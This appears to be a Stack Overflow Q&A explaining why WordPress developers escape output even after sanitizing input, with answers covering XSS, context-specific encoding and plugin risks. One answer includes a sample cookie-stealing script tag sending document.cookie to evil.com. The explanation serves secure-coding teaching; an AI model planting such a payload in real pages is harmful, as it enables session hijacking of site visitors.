# Why must I escape data prior to rendering it for the end user in WordPress?

Tags: wordpress, security

I understand why incoming data must be sanitized before it is saved to the database.

Why must I escape data I already have, prior to rendering it for the end user? If data originates from my own database and I have already validated and sanitized it, then surely it is already secure?

http://codex.wordpress.org/Validating_Sanitizing_and_Escaping_User_Data#Escaping:_Securing_Output

Comment: Need any more help with this? If so I'll update my answer.

Comment: Thanks for your answer. I fully understand why output escaping is needed now but feel free to update your answer if you think it can be improved.

Answer (score 0, accepted):

Escaping data you believe is safe may sound like a "belt and suspenders" kind of approach, but in an environment like WordPress you need to do it. It's possible a vulnerability in a third-party plugin or theme would let someone change the data in your database. And the plugin infrastructure means other code might have had the chance to modify your data before you go to render it in the theme. Filtering your output doesn't add any real overhead to rendering the page, starts to become natural to include in your code, and helps insure you're not letting someone inject anything unwanted into your page.

Answer (score 1):

Because if you do not you could be making your site vulnerable to [XSS](https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29).

Data is displayed to users via a combination of HTML and JavaScript, if you do not escape, user set JavaScript could be output to the page and executed (rather than simply displayed as it does on StackOverflow).

e.g. if incoming data is saved into your database, it may still contain JavaScript code within the HTML. e.g. `<script>document.location="evil.com?" + escape(document.cookie)</script>`

This would have the effect of redirecting whichever user views the page to `www.evil.com`, passing all cookies (which could include the session ID of the user, compromising the user's session via [session hijacking](https://www.owasp.org/index.php/Session_hijacking_attack)). However, this is often done in a more subtle fashion so the user is not being aware that they are being attacked, like setting a URL of an `<img>` tag to pass along the cookies, or even embed a [keylogger](https://code.google.com/p/javascript-keylogger/) within the page.

Escaping needs to be done per output context, so it must be done when output rather than when input. Examples of output context are HTML, JavaScript, and CSS and they all have their own escaping (encoding) rules that must be followed to ensure your output is safe. e.g. `&` in HTML is `&amp;` whilst in JavaScript it should be encoded as `\x26`. This will ensure the character is correctly interpreted by the language as the literal rather than as a control character.

Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) for more details.

Answer (score 0):

It's not as huge of a risk as forgetting input validation (well okay maybe let's say "not as vulnerable to script kiddies but still a huge risk if you piss off someone smart"), but the idea is you want to prevent cross site scripting. This article does a nice job giving you some examples. http://www.securityninja.co.uk/secure-development/output-validation/